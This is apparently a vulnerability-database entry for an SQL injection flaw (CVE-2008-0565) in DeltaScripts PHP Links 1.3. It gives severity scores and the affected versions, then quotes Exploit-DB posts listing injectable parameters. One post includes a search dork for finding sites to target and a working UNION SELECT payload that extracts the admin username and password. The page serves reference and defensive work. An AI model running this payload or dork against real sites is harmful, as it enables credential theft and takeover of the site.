CVE-2008-0565
published 2008-02-05
Priority P336 · medium · 6.8 CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.06% (60.3th percentile)
SQL injection vulnerability in vote.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltascripts | php_links | <= 1.3 | — |
No detection rules found.
Exploit-DB
DELTAScripts PHP Links - Multiple SQL Injections
exploitdb·2012-09-10
CVE-2008-6720 DELTAScripts PHP Links - Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.ph
Exploit-DB
PHP Links 1.3 - 'id' SQL Injection
exploitdb·2008-01-30
CVE-2008-0565 PHP Links 1.3 - 'id' SQL Injection
---
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3
= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )
= BUG : Remote SQL Injection Vulnerability
= Dork : Powered by PHP Links from DeltaScripts
= Exploit :
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--
= Note : admin login http://Target/path/admin/
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
# milw0rm.com [2008-01-30]
No writeups or analysis indexed.